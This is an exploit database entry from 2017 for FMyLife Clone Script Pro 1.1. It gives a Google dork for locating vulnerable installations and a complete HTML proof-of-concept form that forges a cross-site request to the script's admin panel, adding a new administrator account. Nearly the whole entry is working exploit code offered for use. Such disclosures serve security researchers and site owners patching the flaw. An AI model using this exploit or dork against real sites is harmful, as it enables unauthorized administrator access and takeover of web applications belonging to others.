FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)

EDB-ID:

41007

CVE:

N/A




Platform:

PHP

Date:

2017-01-10


# # # # # 
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/   
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
 <div id="add-admin-form">
  <input type="hidden" name="action" value="add-admin" />
  <label for="username">Username:</label>
  <input type="text" id="username" name="admin-username" value="" />
  <div class="spacer"></div>
  <label for="password">Password:</label>
  <input type="password" id="password" name="admin-password" value="" />
  <div class="spacer"></div>
  <input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
 </div>
</form>
</body>
</html>
# # # # #